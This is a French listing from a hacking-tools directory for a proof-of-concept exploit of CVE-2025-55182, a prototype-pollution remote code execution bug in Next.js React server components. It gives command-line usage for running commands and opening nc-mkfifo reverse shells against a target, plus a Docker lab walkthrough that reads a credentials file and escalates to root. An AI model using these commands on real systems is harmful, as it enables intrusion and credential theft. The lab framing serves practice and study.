Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC_react2shell_CVE-2025-55182 — Exploit pour CVE-2025-55182 ciblant les composants serveur React de Next.js via une pollution de prototype, permettant l'exécution de code à distance avec des charges utiles de commande et de shell inversé. Inclut des environnements de laboratoire Docker pour s'entraîner. | Kitploit
Outils/GitHubGitHub/nkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182
Génération de PayloadsExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubnkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182

POC_react2shell_CVE-2025-55182

Exploit pour CVE-2025-55182 ciblant les composants serveur React de Next.js via une pollution de prototype, permettant l'exécution de code à distance avec des charges utiles de commande et de shell inversé. Inclut des environnements de laboratoire Docker pour s'entraîner.

Voir le dépôtSite web
24il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploitation RCE des composants serveur React de Next.js

Exploite CVE-2025-55182 pour exécution de code à distance via pollution de prototype.

Auteur : Severian N.K.

Description

Cet outil exploite une vulnérabilité de pollution de prototype dans les applications Next.js utilisant les composants serveur React, menant à une exécution de code à distance (RCE). Il prend en charge à la fois l'exécution directe de commandes et les shells inversés.

Installation

Ce projet utilise un environnement virtuel Python pour gérer les dépendances. Tout d'abord, assurez-vous d'avoir Python 3 installé.

  1. Configurer l'environnement virtuel :

    root@kitploit:~
    python3 -m venv venv
    
  2. Activer l'environnement et installer les dépendances :

    root@kitploit:~
    source venv/bin/activate
    pip install -r requirements.txt
    

Utilisation

Assurez-vous que l'environnement virtuel est activé (source venv/bin/activate) avant d'exécuter l'exploit.

Exécution de commande

Pour exécuter une commande unique sur la cible :

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c "<COMMAND>"

Exemple :

root@kitploit:~
python3 exploit.py -u http://example.com -c "id"

Shell inversé

Pour obtenir un shell inversé depuis la cible :

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r -l <LISTENER_IP> -p <LISTENER_PORT>

Exemple :

root@kitploit:~
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo

Environnement de laboratoire

Le répertoire lab/ contient deux environnements Docker indépendants :

  1. Application vulnérable (lab/vulnerable) : fonctionne sur le port 3000.
  2. Application corrigée (lab/patched) : fonctionne sur le port 3001.

1. Configuration de l'application vulnérable

root@kitploit:~
cd lab/vulnerable
chmod +x build.sh run.sh
./build.sh
./run.sh

Accès : http://localhost:3000

2. Configuration de l'application corrigée

root@kitploit:~
cd lab/patched
chmod +x build.sh run.sh
./build.sh
./run.sh

Accès : http://localhost:3001

3. Test du shell inversé

Vous devez spécifier votre IP d'écoute (--lhost) et votre port (--lport). Vous pouvez trouver l'IP de votre pont Docker avec ip addr show docker0 (généralement 172.17.0.1).

root@kitploit:~
python exploit.py -u http://localhost:3000 -r -l 172.17.0.1 -p 6000 -P nc-mkfifo

Remarque : Nous utilisons -P nc-mkfifo car la cible exécute Alpine Linux, ce qui nécessite un type de payload spécifique.

Étape 2 : Accès aux secrets

Le conteneur vulnérable expose un fichier secret.

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "cat /secret/credentials.txt"
# Output: manager:SuperSecret2025!

Étape 3 : Élévation de privilèges

Vous pouvez passer de nextjs à root en utilisant les identifiants compromis.

  1. Changer d'utilisateur : su - manager (Mot de passe : SuperSecret2025!)
  2. Devenir root : sudo su (Mot de passe : SuperSecret2025!)
  3. Capturer le drapeau :
    root@kitploit:~
    cat /root/flag.txt
    # Output: Congratulations! You have gained full control over the system!
    

Références

  • Analyse technique (Gist)
  • Laboratoire pratique (TryHackMe)

Contribution

Les contributions sont les bienvenues ! Si vous trouvez un bug ou avez une idée d'amélioration, veuillez ouvrir une issue ou soumettre une pull request.

Télécharger l’outil